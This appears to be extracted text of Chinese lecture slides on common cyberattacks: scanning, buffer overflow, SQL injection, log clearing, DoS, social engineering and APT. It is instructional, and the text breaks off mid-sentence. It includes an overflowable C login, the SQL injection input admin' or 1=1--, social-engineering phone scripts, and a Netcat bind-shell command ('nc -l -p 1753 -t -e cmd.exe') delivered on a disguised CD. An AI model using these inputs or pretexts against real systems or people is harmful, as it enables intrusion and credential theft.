信息安全理论与技术 2、常见攻击手段

信息安全基本原理与技术目录信息安全概述常见攻击手段密码学知识认证与数字签名网络安全防御体系访问控制可信计算安全性攻击被动攻击攻击者在未被授权的情况下，非法获取信息或数据文件，但不对数据信息作任何修改

搭线监听、无线截获、其他截获、流量分析破坏了信息的机密性主动攻击包括对数据流进行篡改或伪造

伪装、重放、消息篡改，破坏了信息的完整性拒绝服务，破坏了信息系统的可用性威胁计算机安全的主要因素漏洞漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。为了防范漏洞，最好的办法是及时为操作系统和服务打补丁。所谓补丁，是软件公司为已发现的漏洞所作的修复行为。病毒病毒是能够破坏计算机功能和数据、能够自我复制的一组程序或代码。蠕虫、木马、后门都属于病毒的范畴。为了防范病毒，最好的办法是安装杀毒软件。一次网络攻击包含的几个步骤攻击的步骤解释例子侦查被动或者主动获取信息的过程嗅探网络流量，察看HTML代码，社交工程，获取目标系统的一切信息扫描及漏洞分析识别所运行系统和系统上活动的服务，从中找出可攻击的弱点Ping扫描、端口扫描、漏洞扫描获取访问权限攻击识别的漏洞，以获取未授权的访问权限利用缓冲区溢出或者暴力破解口令，并登录系统保持访问权限上传恶意软件，以确保能重新进入系统在系统上安装后门消除痕迹消除恶意活动的踪迹删除或修改系统和应用日志中的数据侦查侦查也被称为踩点，目的是发现目标通过踩点主要收集以下可用信息：网络域名内部网络外部网络目标所用的操作系统扫描扫描主要是指通过固定格式的询问来试探主机的某些特征的过程，而提供了扫描功能的软件工具就是扫描器。“一个好的扫描器相当于数百个合法用户的账户信息”。

分为端口扫描和漏洞扫描

加载检查目标检查引擎检测报告检测规则扫描器的工作流程端口扫描扫描端口的主要目的是判断目标主机的操作系统以及开放了哪些服务。端口是由计算机的通信协议TCP/IP协议定义的。计算机之间的通信，归根结底是进程间的通信，而端口则与进程相对应。端口分类：熟知端口（公认端口）：由因特网指派名字和号码公司ICANN负责分配给一些常用的应用层程序固定使用的熟知端口，端口号一般为0～1023。表9-2和表9-3列出了常见的熟知端口。一般端口：用来随时分配给请求通信的客户进程。

常见TCP熟知端口服务名称端

口

号说

明FTP21文件传输服务Telnet23远程登录服务HTTP80网页浏览服务POP3110邮件服务SMTP25简单邮件传输服务Socks1080代理服务常见UDP熟知端口服务名称端

口

号说

明RPC111远程调用SNMP161简单网络管理TFTP69简单文件传输漏洞扫描漏洞扫描通常通过漏洞扫描器来执行。漏洞扫描器是通过在内部放置已知漏洞的特征，然后把被扫描系统特征和已知漏洞相比对，从而获取被扫描系统漏洞的过程。漏洞扫描只能找出目标机上已经被发现并且公开的漏洞扫描器X-Scan

流光

零日（0day）漏洞一些没有公布补丁的漏洞，或者是还没有被漏洞发现者公布出来的漏洞利用工具，由于这种漏洞的利用程序对网络安全都具有巨大威胁，因此0day也成为黑客的最爱。获取访问权限

缓冲区溢出SQL注入攻击缓冲区溢出缓冲区溢出就好比是把2升的水倒入1升的水罐中，肯定会有一部分水流出并且造成混乱。声明一个在内存中占10个字节的字符串：charstr1[10];编译器为缓冲区划分了10个字节大小的空间，从str1[0]到str1[9]，每个都分别占用一个字节的空间。那么，执行下列语句：strcpy(str1,“AAAAAAAAAAAAAAAAAAAAAA”);则会造成缓冲区溢出。因为strcpy这个函数根本就不会检查后面的字符串是否比str1所分配的空间要大。如果溢出的数据为B，则可能：用户数据用户数据AAAAAAAAAAB内存：用户程序代码用户数据AAAAAAAAAAB内存：系统数据用户数据AAAAAAAAAAB内存：系统程序代码用户数据AAAAAAAAAAB内存：溢出实例

#include<stdio.h>#definePASSWORD"1234567"intverify_password(char*password){intauthenticated;charbuffer[8];authenticated=strcmp(password,PASSWORD);strcpy(buffer,password);returnauthenticated;}intmain(){intvalid_flag=0;charpassword[1024];while(1){printf("pleaseinputpassword:");scanf("%s",password);valid_flag=verify_password(password);if(valid_flag){printf("incorrectpassword!\n\n");}else{printf("Congratulation!Youhavepassedtheverification!\n");break;}}}输入了正确的密码“1234567”之后才能通过验证

函数verify_password()里边申请了两个局部变量：int

authenticated和char

buffer[8]。当verify_password()被调用时，系统会给它分配一片连续的内存空间，这两个变量就分布在那里（实际上就叫函数栈帧）Buffer[8]charbuffer[0~3]charbuffer[4~7]intautherticated(0x00000001)输入包含8个字符的错误密码“qqqqqqqq”，那么buff[8]所拥有的8个字节将全部被“q”的ASCII码0x71填满，而字符串的结束标志NULL刚好写入了authenticated变量并且值为0x00000000。于是，错误的密码得到了正确密码的运行效果。用“qqqqqqqq”成功突破了限制SQL注入攻击如果用户的输入能够影响到脚本中SQL命令串的生成，那么很可能在添加了单引号、“#”号等转义命令字符后，能够改变数据库最终执行的SQL命令，攻击者就利用这个特点修改自己的输入，最终获取数据库中自己所需要的信息，例如管理员密码。这就是SQL注入。SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以防火墙不会对SQL注入发出警报SQL注入的简单实例PHP:mysql_connect(“localhost”,”username”,”password”);mysql_select_db([“USERS”]);$query=“SELECTidFROMuserWHEREusername=‘$_POST[“username”]’”.”ANDpassword=‘$_POST[“password”]’”;$result=mysql_query($query);if($result)header(“Location:admin.php”);elsedie(“Incorrectusernameorpassword,pleasetyragain.”);SQL注入的简单实例1、输入admin 123SQL:SELECTidFROMuserWHEREusername=‘admin’ANDpassword=‘123’;2、输入admin‘or1=1--SQL:SELECTidFROMuserWHEREusername=‘admin’or1=1--’ANDpassword=‘’;SQL注入的一般过程猜判断是否能注入猜数据库猜表名猜字段名猜字段值猜的例子故意输错字符，引导出错页面。如：输入单引号猜的例子

保持访问权限开放新帐号容易被管理员察觉安装后门具有隐蔽性和非授权性

Rootkit通过替换系统文件来达到目的。这样就会更加的隐蔽，使检测变得比较困难。

消除入侵痕迹在所有的操作系统中，包括Windows和Unix系统，都有自己的日志系统。在日志中记载了各种信息，例如用户对其的操作、应用程序所作的行为、各种各样的安全事件等。当入侵者非法进入了系统后，往往会被这些日志记录下来。而管理员通过日志，则有可能分析出入侵者的行为，甚至是根据线索找到入侵者。Windows的“事件查看器”通过“开始→控制面板→管理工具→事件查看器”将其打开Windows的“事件查看器”应用程序日志由应用程序或系统程序记录的事件，主要记录程序运行方面的事件安全性日志记录了诸如有效和无效的登录尝试等事件，以及与资源使用相关的事件系统日志WindowsXP的系统组件记录的事件Windows的日志文件DNS日志默认位置%systemroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小；安全日志文件%systemroot%\system32\config\SecEvent.EVT；系统日志文件%systemroot%\system32\config\SysEvent.EVT；应用程序日志文件%systemroot%\system32\config\AppEvent.EVT；FTP日志默认位置%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志；WWW日志默认位置%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志。其它的攻击行为拒绝服务攻击社会工程学APT攻击拒绝服务攻击拒绝服务攻击（DenialofService，简称DoS）是指攻击者利用系统的缺陷，通过执行一些恶意的操作而使合法的系统用户不能及时的得到服务或者系统资源，如CPU处理时间、存储器、网络带宽、Web服务等。它本身并不能使攻击者获取什么资源，例如系统的控制权力、秘密的文件等，它只是以破坏服务为目的。常见的拒绝服务攻击方法常见的拒绝服务攻击方法基于网络带宽消耗的拒绝服务攻击消耗磁盘空间的拒绝服务攻击消耗CPU资源和内存的拒绝服务攻击基于系统缺陷的拒绝服务攻击分布式拒绝服务攻击分布式拒绝服务（DistributedDenialofService，DDoS）攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。攻击者控制傀儡机控制傀儡机攻击傀儡机攻击傀儡机攻击傀儡机攻击傀儡机攻击傀儡机攻击傀儡机受害者社会工程学社会工程学，一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段，取得自身利益的手法，近年来已成迅速上升甚至滥用的趋势。简单来说，社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。术语和手段假托（pretexting）是一种制造虚假情形，以迫使针对受害人吐露平时不愿泄露的信息的手段。该方法通常预含对特殊情景专用术语的研究，以建立合情合理的假象。调虎离山（diversiontheft）钓鱼（phishing）在线聊天/电话钓鱼（IVR/phonephishing，IVR:interactivevoiceresponse）下饵（Baiting）等价交换（Quidproquo）攻击者伪装成公司内部技术人员或者问卷调查人员，要求对方给出密码等关键信息。尾随（Tailgating）几个社会工程学案例一位部门秘书接到一个电话,"我是JosieBass,有什么能帮您的吗?"“你好，我是计算机中心的MartinWhite,我们认为可能有人入侵了文件服务器，我能和你们技术主管谈谈吗?”“现在是周五下午，这里只有我一个人。”Josie说。“你的工作怎么样，Josie？”[ˈdʒoʊzi]“还好，你呢？”深呼一口气，“不算太坏,除了现在是周五的下午而且我们要处理堆积如山的文件。总之，如我所说的，我们认为你的文件服务器受到了威胁。”“你为什么这么认为呢？”“你的帐号是jbass,是吗？”“是。”“我们在你的文件服务器上检测到了异常的通信。”“好，你能不能具体点告诉我这是怎么回事？”“当然,我正在搜索,但有太多文件了。”翻页的声音。“我真正担心的是,当我这样搜索时,坏人可以从你们的服务器下载并修改资料，也许你应该把你的服务器与网络断开或者修改你的系统密码。”“Jeez,我不知道该怎么做。”Martin叹息，“这真糟糕，入侵者可能没有完全地破坏你的系统。”手指翻动书，发出翻页的声音。“我刚才想到一件事，我正好在线，如果我有你的密码的话，只要几分钟就可查出来了。”沉重的叹息，“为什么我之前没有想到呢？持续一个星期了—看了很多小时的数字。”一番停顿后，“Ok,你的密码多少？”

“我…er….”Josie犹豫了。“哦，好的，你不会把它拿出来，我明白了。”翻页的声音。“这也是个好办法。”停顿了一下，“这些家伙会尝试不同的方法入侵…”翻页。“嘿，”Josie说，“我们会整晚都在这里，忘了告诉你：我的密码是jb2cats。”“谢谢，好的，稍等。”密码输入的声音。“好了，让我仔细检查一下。”更多的输入。“找到了，好消息，他们没能进入你的系统。”停顿，“非常感谢，Josie，我们一起为这件无效的事上折腾了半夜，顺便说一声，一旦他们跳过了你的服务器，再回来就是很罕见的事了，你的系统现在状况良好。”“谢谢，祝你有一个愉快的周末。”Josie放心地回答。“你也是。”“MartinWhite”和他的同伙将会有一个愉快的周末，从这个部门修改他们选修课程的学生等级——为了学费，当然。（译者注：这里的意思应该是Martin的课程没及格，需要重修，把成绩修改了，自然就不需要交纳学费了。）职员：这里是电话公司A分店，有什么能帮你

仁兄：你好，我叫仁兄，我之前去过你们的店，我想申请一个手机服务，你们以为姓李的店员（当然是猜的）介绍了一个不错服务给我。我当时没有拿定注意，现在我决定申请那个服务了，哦～～～，那个店员叫李～～～，我不记得了，你知道吗？？？

店员：～～～，我们店了有两个姓李的，你说男的还是女的？？？

仁兄：对，是男的，他说他叫李～～，不好意思，我忘记了名字，你能告诉我吗？？

店员：叫李XX

仁兄：对，就叫李XX，我马上就去你们店里办理相关服务开通的手续。再见

店员：再见。

之后，这位仁兄又打电话给了令一间分店，分店B

仁兄：你好，请问是分店B吗

职员：是，请问有什么可以帮你

仁兄：我是分店A的李XX,我这里有一个顾客刚刚和我们签订了那个一分钱手机换购合约，但是之后我才发现店里那个手机的型号已经没有存货了，你们店里还有吗？？？

职员：有的

仁兄：好级了，我已经和他签订了线路使用和约，我现在叫他去你那里，你用一分钱把手机卖给他就可以了。

职员：好的，你叫他来吧。

半小时候，这位仁兄出现在了分店B里，用一分钱换购走了手机。

这里是曾经发生的一个示例。几年前，马杰去一家不动产公公司在管理员离开之后的安全性。当他走到管理员的办公桌前他发现了几张马匹的照片，马杰猜想他一定拥有其中的一些马匹，就故意对旁边的小隔间大声感叹，“哇，多么漂亮的马呀!，这是他的马吗?”在得到了肯定之后，马杰问“他们叫什么名字?”果然，网络管理员使用的口令是这些马匹的名字之一。

这个案例研究要求渗透测试者李明被应用来对一所小学做社会工程测试。其目标是获取学校系统的访问权限修改学生的成绩。

李明要做的第一步工作就是了解这所学校使用的学籍管理软件。他开始在互联同上进行搜索．寻找通用的学籍管理软件。李明找到了一些这样的软件，包括ActiD、Gradebook、AutoGrad、GradeGenie、ThinkWave，Next5G,ading、共拓学籍管理、点通学藉管理等。李明也浏览了一些教育论坛．寻找讨论各学搜使用IT技术的情况。通过收集这方面的情况，事明找到了附近的一所小学，名字为”东方小学”。掌握了这些情况之后，李明在打电话时就胸有成竹了。李明打电话给这所学校，请求与负责技术的人员通话。对方将他介绍绐一位名叫马涛的技术人员。下面是他们之间的淡话：

李明：你好，是马涛马先生吗?我是李明，我在附近的“惠民小学”工作领导刚分配我负责学校的技术工作，但说实话，我对技术了解不多，因此我希望能够得到你的帮助。至此，事明已经说出了他的期待。由于人们通常都乐于帮助别人，李明认如马涛会乐于帮助他。

马涛；李明．你好。你在惠民小学？赵华怎么了?我知道她在那所学校负责技术李明：呵呵，她现在不做这个工作了。但现拉她升官了。我是她的手下，她是一个很好的人。

尽管看起来李明就要露馅了，但谎称赵华升职了。李明还通过赞扬她的话语来使谈话更轻松起来。

李明：最近，赵华让我考察一下新的学籍管理软件的事情。我看了几个软件比如：共拓学籍管理、一点通学藉管理等．但我不能确定哪一个软件最灵活，你们用的是哪个学籍管理软件？李明陈述了自己在学籍管理软件方面的知识，来免除马涛对自己教育背景的怀疑．李明还询问马涛哪一个软件软件最灵活，原因在于他在论坛中已经看到这些软件的流行程度和灵活程度的排名。

马涛：我们一直在使用Gradebook．对这个软件我们很满意。至此，李明继续问一些与这个软件有关的问题，依据是事先对这个软件的了解。当谈话结束时，李明已经知道了这个学校使用的学籍软件的类型．负责技术的工作人员的姓名是马涛。在下一个阶段，李明选择了另一个人与马涛联系，原因在于他可能会听出李明的声音。此外，由于马涛是位男士，常言道，男女搭配．干活不累，因此，李明请他的同事王晨冒充ThinkWave的销售代表来打这个电话。在与马涛联系之前，王晨等待了数周，以避免惹人注目。

王晨：你好，是马涛吗?我是ThinkWave公司的业务代表王晨。我们想请你参加我们的客户改进计划，作为回报，在未来软件升级时，贵校可以得到20％的折扣。

由于大多数公办学校的资金都比较紧张，因此可以合理地认为马涛会被这个省钱的说辞打动。

马涛：是吗?需要我做些什么?

王晨：这样，我将向你发送一款报告软件，你把它放在服务器上。在发送给你的邮件中，包含了这个软件的配置方法。这个软件的主要功能是。在系统出现任何错误时．他都生成一份报告，并发送给我们。它不发送任何个人信息．仅仅发送计算机的类型、发生错误的时间、发生错误时系统中运行的进程。通过从我们的客户那里收集这些信息．我们希望在未来的发行版本中能够减少软件错误。马涛：很好呀。在这次通话之后，李明从网上下载ThinkWave的标志，并在信纸的抬头上印上这个标志。李明在网上找到FainkWave的地址，并向马涛寄送一个包裹，寄件人地址写上ThinkWave的地址。包括中包含了一张带有Nctcat实用程序(当然你也可以使用其他的木马程序)的CD和一封信，信的内容为：马先生，你好：感谢参与本公司客户改进计划。我们确认你的协助将会帮助改进我们产品未来发行版本的质量。与这封信一起寄给您的十一章包含报告软件的CD。当系统中发生错误时这个软件将会生成一份报告，并发送给我们。我向你保证不会发送任何个人信息。安装这个报告程序的方法是将CD放到服务器光驱中，它将自动启动安装程序，如果没有启动的话，使用setup.exe安装。这个报告程序使用TCP端口1753，您需要在防火墙上打开这个端口。打开这个端口的具体方法，请参阅您的防火墙文档。通过参与我们的客户改进计划，在未来软件升级时，你将自动得到20%的折扣。感谢你的支持和参与。

祝身体健康、一切顺利！

ThinkWave公司代表王晨

2007年4月26日CD的内容是李明生成的一个安装程序，它将Netcat安装在服务器硬盘的根目录下：Netcat是一个后门应用程序，它为李明提供了进入服务器的远程访问。安装脚本使用下面的参数启动Netcat：

c:\nc-l-p1753-t-ecmd.exe

数天之后，李明请王晨打电话给马涛。

王晨：你好，我是王晨，我这次打电话是想问一问你，在安装我们的报告软件时遇到什么问题了没有?

马涛：没有，一点问题也没有。王晨：这就好。我们就想听到这样的话。现在我们需要知道你的外部IP地址，以便在我们收到报告时，知道这份报告来自你那里。马涛：没问题。我查一查，找到了，IP地址是200．30．55．28．王晨：太谢谢你了。如果你有什么需要，就告诉我们。你有我们的技术支持电话号码吗。马涛：我有。然后~~~~你懂的~~~~~KevinMitnick

社会工程师

一个无所顾忌的魔术师，用他的左手吸引你的注意，右手窃取你的秘密。他通常十分友善，很会说话，并会让人感到遇上他是件荣幸的事情。

-----凯文.米特尼克

APT攻击高级持续性威胁(Advanced

Persistent

Threat，APT)，APT（高级持续性渗透攻击）是一种以商业和政治为目的的网络犯罪类别，通常使用先进的攻击手段对特定目标进行长期持续性的网络攻击，具有长期经营与策划、高度隐蔽等特性。这种攻击不会追求短期的收益或单纯的破坏，而是以步步为营的渗透入侵策略，低调隐蔽的攻击每一个特定目标，不做其他多余的活动来打草惊蛇。APT攻击阶段划分APT攻击可划分为以下6个阶段:情报搜集首次突破防线幕后操纵通讯横向移动资产/资料发掘资料外传情报收集黑客透过一些公开的数据源(LinkedIn、Facebook等等)搜寻和锁定特定人员并加以研究，然后开发出客制化攻击。这个阶段是黑客信息收集阶段，其可以通过搜索引擎，配合诸如爬网系统，在网上搜索需要的信息，并通过过滤方式筛选自己所需要的信息；信息的来源很多，包括社交网站，博客，公司网站，甚至通过一些渠道购买相关信息（如公司通讯录等）首次突破防线黑客在确定好攻击目标后，将会通过各种方式来试图突破攻击目标的防线.常见的渗透突破的方法包括：电子邮件；即时通讯；网站挂马；通过社会工程学手段欺骗企业内部员工下载或执行包含零日漏洞的恶意软件（一般安全软件还无法检测），软件运行之后即建立了后门，等待黑客下一步操作。幕后操纵通讯黑客在感染或控制一定数量的计算机之后，为了保证程序能够不被安全软件检测和查杀，会建立命令，控制及更新服务器（C&C服务器，命令和控制服务器），对自身的恶意软件进行版本升级，以达到免杀效果；同时一旦时机成熟，还可以通过这些服务器，下达指令。采用http/https标准协议来建立沟通，突破防火墙等安全设备；C&C服务器会采用动态迁移方式来规避企业的封锁黑客会定期对程序进行检查，确认是否免杀，只有当程序被安全软件检测到时，才会进行版本更新，降低被IDS/IPS（入侵检测系统/入侵防御系统）发现的概率；横向移动黑客入侵之后，会尝试通过各种手段进一步入侵企业内部的其他计算机，同时尽量提高自己的权限。黑客入侵主要利用系统漏洞方式进行；企业在部署漏洞防御补丁过程存在时差，甚至部分系统由于稳定性考虑，无法部署相关漏洞补丁在入侵过程中可能会留下一些审计报错信息，但是这些信息一般会被忽略。资产/资料发掘在入侵进行到一定程度后，黑客就可以接触到一些敏感信息，可通过C&C服务器下发资料发掘指令：采用端口扫描方式获取有价值的服务器或设备；通过列表命令，获取计算机上的文档列表或程序列表；资料外传一旦搜集到敏感信息，这些数据就会汇集到内部的一个暂存服务器，然后再整理、压缩，通常并经过加密，然后外传。资料外传同样会采用标准协议(http/https，SMTP电子邮件传输的协议等）信息泄露后黑客再更具信息进行分析识别，来判断是否可以进行交易或者破坏。对企业和国家造成较大影响。APT攻击的案例：破坏伊朗核计划攻击目标：伊朗布什尔核电站目标特性：与外界完全隔离主要手段：大数据分析、社会工程学主要病毒：震网（Stuxnet）、火焰（Flame）攻击者利